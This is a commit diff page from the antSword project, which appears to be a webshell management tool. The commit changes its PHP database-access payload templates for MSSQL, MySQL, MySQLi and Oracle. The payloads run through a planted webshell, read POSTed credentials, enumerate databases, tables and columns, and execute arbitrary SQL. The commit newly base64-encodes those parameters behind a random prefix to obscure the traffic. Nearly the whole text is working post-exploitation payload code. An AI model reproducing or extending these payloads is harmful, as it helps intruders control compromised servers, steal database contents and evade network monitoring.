Skip to content

A
antSword
Commit 82ab2d01 authored by Medicean's avatar Medicean
Browse files
Options

Enhance(Core/PHP): 数据库附加字段从明文改为newbase64

parent 035ddb5d
Show whitespace changes
Inline Side-by-side
Showing with 231 additions and 147 deletions
source/core/php/template/database/mssql.js
View file @ 82ab2d01
...@@ -7,9 +7,9 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -7,9 +7,9 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库 // 显示所有数据库
show_databases: { show_databases: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$T=@mssql_connect($hst,$usr,$pwd); $T=@mssql_connect($hst,$usr,$pwd);
$q=@mssql_query("select [name] from master.dbo.sysdatabases order by 1",$T); $q=@mssql_query("select [name] from master.dbo.sysdatabases order by 1",$T);
while($rs=@mssql_fetch_row($q)){ while($rs=@mssql_fetch_row($q)){
...@@ -17,17 +17,17 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -17,17 +17,17 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
@mssql_free_result($q); @mssql_free_result($q);
@mssql_close($T);`.replace(/\n\s+/g, ''), @mssql_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}' [arg3]: '#{newbase64::passwd}'
}, },
// 显示数据库所有表 // 显示数据库所有表
show_tables: { show_tables: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$T=@mssql_connect($hst,$usr,$pwd); $T=@mssql_connect($hst,$usr,$pwd);
@mssql_select_db($dbn,$T); @mssql_select_db($dbn,$T);
$q=@mssql_query("SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1",$T); $q=@mssql_query("SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1",$T);
...@@ -36,19 +36,19 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -36,19 +36,19 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
@mssql_free_result($q); @mssql_free_result($q);
@mssql_close($T);`.replace(/\n\s+/g, ''), @mssql_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}' [arg4]: '#{newbase64::db}'
}, },
// 显示表字段 // 显示表字段
show_columns: { show_columns: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$tab=$m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"]; $tab=base64_decode(substr($m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"],#randomPrefix#));
$T=@mssql_connect($hst,$usr,$pwd); $T=@mssql_connect($hst,$usr,$pwd);
@mssql_select_db($dbn,$T); @mssql_select_db($dbn,$T);
$q=@mssql_query("SELECT TOP 1 * FROM {$tab}",$T); $q=@mssql_query("SELECT TOP 1 * FROM {$tab}",$T);
...@@ -57,20 +57,20 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -57,20 +57,20 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
@mssql_free_result($q); @mssql_free_result($q);
@mssql_close($T);`.replace(/\n\s+/g, ''), @mssql_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}', [arg4]: '#{newbase64::db}',
[arg5]: '#{table}' [arg5]: '#{newbase64::table}'
}, },
// 执行SQL语句 // 执行SQL语句
query: { query: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$sql=base64_decode($_POST["${arg5}"]); $sql=base64_decode(substr($m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"],#randomPrefix#));
$T=@mssql_connect($hst,$usr,$pwd); $T=@mssql_connect($hst,$usr,$pwd);
@mssql_select_db($dbn,$T); @mssql_select_db($dbn,$T);
$q=@mssql_query($sql,$T); $q=@mssql_query($sql,$T);
...@@ -93,10 +93,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -93,10 +93,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
@mssql_free_result($q); @mssql_free_result($q);
} }
@mssql_close($T);`.replace(/\n\s+/g, ''), @mssql_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}', [arg4]: '#{newbase64::db}',
[arg5]: '#{base64::sql}' [arg5]: '#{newbase64::::sql}',
} }
}) })
\ No newline at end of file
source/core/php/template/database/mysql.js
View file @ 82ab2d01
...@@ -7,45 +7,45 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -7,45 +7,45 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库 // 显示所有数据库
show_databases: { show_databases: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$T=@mysql_connect($hst,$usr,$pwd); $T=@mysql_connect($hst,$usr,$pwd);
$q=@mysql_query("SHOW DATABASES"); $q=@mysql_query("SHOW DATABASES");
while($rs=@mysql_fetch_row($q)){ while($rs=@mysql_fetch_row($q)){
echo(trim($rs[0]).chr(9)); echo(trim($rs[0]).chr(9));
} }
@mysql_close($T);`.replace(/\n\s+/g, ''), @mysql_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}' [arg3]: '#{newbase64::passwd}'
}, },
// 显示数据库所有表 // 显示数据库所有表
show_tables: { show_tables: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$T=@mysql_connect($hst,$usr,$pwd); $T=@mysql_connect($hst,$usr,$pwd);
$q=@mysql_query("SHOW TABLES FROM \`{$dbn}\`"); $q=@mysql_query("SHOW TABLES FROM \`{$dbn}\`");
while($rs=@mysql_fetch_row($q)){ while($rs=@mysql_fetch_row($q)){
echo(trim($rs[0]).chr(9)); echo(trim($rs[0]).chr(9));
} }
@mysql_close($T);`.replace(/\n\s+/g, ''), @mysql_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}' [arg4]: '#{newbase64::db}'
}, },
// 显示表字段 // 显示表字段
show_columns: { show_columns: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$tab=$m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"]; $tab=base64_decode(substr($m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"],#randomPrefix#));
$T=@mysql_connect($hst,$usr,$pwd); $T=@mysql_connect($hst,$usr,$pwd);
@mysql_select_db( $dbn, $T); @mysql_select_db( $dbn, $T);
$q=@mysql_query("SHOW COLUMNS FROM \`{$tab}\`"); $q=@mysql_query("SHOW COLUMNS FROM \`{$tab}\`");
...@@ -53,25 +53,25 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -53,25 +53,25 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
echo(trim($rs[0])." (".$rs[1].")".chr(9)); echo(trim($rs[0])." (".$rs[1].")".chr(9));
} }
@mysql_close($T);`.replace(/\n\s+/g, ''), @mysql_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}', [arg4]: '#{newbase64::db}',
[arg5]: '#{table}' [arg5]: '#{newbase64::table}'
}, },
// 执行SQL语句 // 执行SQL语句
query: { query: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$sql=base64_decode($_POST["${arg5}"]); $sql=base64_decode(substr($m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"],#randomPrefix#));
$T=@mysql_connect($hst,$usr,$pwd); $T=@mysql_connect($hst,$usr,$pwd);
@mysql_query("SET NAMES $_POST[${arg6}]"); @mysql_query("SET NAMES ".base64_decode(substr($m?stripslashes($_POST["${arg6}"]):$_POST["${arg6}"],#randomPrefix#)));
@mysql_select_db($dbn, $T); @mysql_select_db($dbn, $T);
$q=@mysql_query($sql); $q=@mysql_query($sql);
if(is_bool($q)){echo("Status\t|\t\r\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t\\r\\n"); if(is_bool($q)){echo("Status\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t\\r\\n");
}else{ }else{
$i=0; $i=0;
while($col=@mysql_fetch_field($q)){ while($col=@mysql_fetch_field($q)){
...@@ -88,11 +88,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -88,11 +88,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
} }
@mysql_close($T);`.replace(/\n\s+/g, ''), @mysql_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}', [arg4]: '#{newbase64::db}',
[arg5]: '#{base64::sql}', [arg5]: '#{newbase64::::sql}',
[arg6]: '#{encode}' [arg6]: '#{newbase64::encode}'
} }
}) })
\ No newline at end of file
source/core/php/template/database/mysqli.js
View file @ 82ab2d01
...@@ -7,9 +7,9 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -7,9 +7,9 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库 // 显示所有数据库
show_databases: { show_databases: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
list($hst, $port) = explode(":", $hst); list($hst, $port) = explode(":", $hst);
$port == "" ? $port = "3306" : $port; $port == "" ? $port = "3306" : $port;
$T=@mysqli_connect($hst,$usr,$pwd,"",$port); $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
...@@ -18,17 +18,17 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -18,17 +18,17 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
echo(trim($rs[0]).chr(9)); echo(trim($rs[0]).chr(9));
} }
@mysqli_close($T);`.replace(/\n\s+/g, ''), @mysqli_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}' [arg3]: '#{newbase64::passwd}'
}, },
// 显示数据库所有表 // 显示数据库所有表
show_tables: { show_tables: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
list($hst, $port) = explode(":", $hst); list($hst, $port) = explode(":", $hst);
$port == "" ? $port = "3306" : $port; $port == "" ? $port = "3306" : $port;
$T=@mysqli_connect($hst,$usr,$pwd,"",$port); $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
...@@ -37,19 +37,19 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -37,19 +37,19 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
echo(trim($rs[0]).chr(9)); echo(trim($rs[0]).chr(9));
} }
@mysqli_close($T);`.replace(/\n\s+/g, ''), @mysqli_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}' [arg4]: '#{newbase64::db}'
}, },
// 显示表字段 // 显示表字段
show_columns: { show_columns: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$tab=$m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"]; $tab=base64_decode(substr($m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"],#randomPrefix#));
list($hst, $port) = explode(":", $hst); list($hst, $port) = explode(":", $hst);
$port == "" ? $port = "3306" : $port; $port == "" ? $port = "3306" : $port;
$T=@mysqli_connect($hst,$usr,$pwd,"",$port); $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
...@@ -59,24 +59,24 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -59,24 +59,24 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
echo(trim($rs[0])." (".$rs[1].")".chr(9)); echo(trim($rs[0])." (".$rs[1].")".chr(9));
} }
@mysqli_close($T);`.replace(/\n\s+/g, ''), @mysqli_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}', [arg4]: '#{newbase64::db}',
[arg5]: '#{table}' [arg5]: '#{newbase64::table}'
}, },
// 执行SQL语句 // 执行SQL语句
query: { query: {
_: `$m=get_magic_quotes_gpc(); _: `$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]; $hst=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]; $usr=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"]; $pwd=base64_decode(substr($m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"],#randomPrefix#));
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"]; $dbn=base64_decode(substr($m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"],#randomPrefix#));
$sql=base64_decode($_POST["${arg5}"]); $sql=base64_decode(substr($m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"],#randomPrefix#));
list($hst, $port) = explode(":", $hst); list($hst, $port) = explode(":", $hst);
$port == "" ? $port = "3306" : $port; $port == "" ? $port = "3306" : $port;
$T=@mysqli_connect($hst,$usr,$pwd,"",$port); $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
@mysqli_query($T,"SET NAMES $_POST[${arg6}]"); @mysqli_query($T,"SET NAMES ".base64_decode(substr($m?stripslashes($_POST["${arg6}"]):$_POST["${arg6}"],#randomPrefix#)));
@mysqli_select_db($T,$dbn); @mysqli_select_db($T,$dbn);
$q=@mysqli_query($T,$sql); $q=@mysqli_query($T,$sql);
if(is_bool($q)){ if(is_bool($q)){
...@@ -96,11 +96,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -96,11 +96,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
} }
} }
@mysqli_close($T);`.replace(/\n\s+/g, ''), @mysqli_close($T);`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{newbase64::host}',
[arg2]: '#{user}', [arg2]: '#{newbase64::user}',
[arg3]: '#{passwd}', [arg3]: '#{newbase64::passwd}',
[arg4]: '#{db}', [arg4]: '#{newbase64::db}',
[arg5]: '#{base64::sql}', [arg5]: '#{newbase64::::sql}',
[arg6]: '#{encode}' [arg6]: '#{newbase64::encode}'
} }
}) })
\ No newline at end of file
source/core/php/template/database/oracle.js
View file @ 82ab2d01
...@@ -6,14 +6,49 @@ ...@@ -6,14 +6,49 @@
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库 // 显示所有数据库
show_databases: { show_databases: {
_: `$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];$H=@Ora_Logon("\${usr}/\${pwd}@\${sid}","");if(!$H){echo("ERROR:// Login Failed!");}else{$T=@ora_open($H);@ora_commitoff($H);$q=@ora_parse($T,"SELECT USERNAME FROM ALL_USERS ORDER BY 1");if(ora_exec($T)){while(ora_fetch($T)){echo(trim(ora_getcolumn($T,0)).chr(9));}}@ora_close($T);};`, _: `$m=get_magic_quotes_gpc();
$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];
$H=@Ora_Logon("\${usr}/\${pwd}@\${sid}","");
if(!$H){
echo("ERROR:// Login Failed!");
}else{
$T=@ora_open($H);
@ora_commitoff($H);
$q=@ora_parse($T,"SELECT USERNAME FROM ALL_USERS ORDER BY 1");
if(ora_exec($T)){
while(ora_fetch($T)){
echo(trim(ora_getcolumn($T,0)).chr(9));
}
}
@ora_close($T);
};`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{host}',
[arg2]: '#{user}', [arg2]: '#{user}',
[arg3]: '#{passwd}' [arg3]: '#{passwd}'
}, },
// 显示数据库所有表 // 显示数据库所有表
show_tables: { show_tables: {
_: `$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");if(!$H){echo("ERROR:// Login Failed!");}else{$T=@ora_open($H);@ora_commitoff($H);$q=@ora_parse($T,"SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{$dbn}' ORDER BY 1)");if(ora_exec($T)){while(ora_fetch($T)){echo(trim(ora_getcolumn($T,0)).chr(9));}}@ora_close($T);};`, _: `$m=get_magic_quotes_gpc();
$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];
$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];
$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
if(!$H){
echo("ERROR:// Login Failed!");
}else{
$T=@ora_open($H);
@ora_commitoff($H);
$q=@ora_parse($T,"SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{$dbn}' ORDER BY 1)");
if(ora_exec($T)){
while(ora_fetch($T)){
echo(trim(ora_getcolumn($T,0)).chr(9));
}
}
@ora_close($T);
};`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{host}',
[arg2]: '#{user}', [arg2]: '#{user}',
[arg3]: '#{passwd}', [arg3]: '#{passwd}',
...@@ -21,7 +56,25 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ ...@@ -21,7 +56,25 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
}, },
// 显示表字段 // 显示表字段
show_columns: { show_columns: {
_: `$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];$tab=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");if(!$H){echo("ERROR:// Login Failed!");}else{$T=@ora_open($H);@ora_commitoff($H);$q=@ora_parse($T,"SELECT COLUMN_NAME,DATA_TYPE FROM ALL_TAB_COLUMNS WHERE TABLE_NAME='{$tab}' ORDER BY COLUMN_ID");if(ora_exec($T)){while(ora_fetch($T)){echo(trim(ora_getcolumn($T,0))." (".ora_getcolumn($T,1).")".chr(9));}}@ora_close($T);};`, _: `$m=get_magic_quotes_gpc();
$sid=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];
$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];
$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];
$tab=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];
$H=@ora_plogon("{$usr}@{$sid}","{$pwd}");
if(!$H){
echo("ERROR:// Login Failed!");
}else{
$T=@ora_open($H);
@ora_commitoff($H);
$q=@ora_parse($T,"SELECT COLUMN_NAME,DATA_TYPE FROM ALL_TAB_COLUMNS WHERE TABLE_NAME='{$tab}' ORDER BY COLUMN_ID");
if(ora_exec($T)){
while(ora_fetch($T)){
echo(trim(ora_getcolumn($T,0))." (".ora_getcolumn($T,1).")".chr(9));
}
}
@ora_close($T);
};`.replace(/\n\s+/g, ''),
[arg1]: '#{host}', [arg1]: '#{host}',
[arg2]: '#{user}', [arg2]: '#{user}',
[arg3]: '#{passwd}', [arg3]: '#{passwd}',
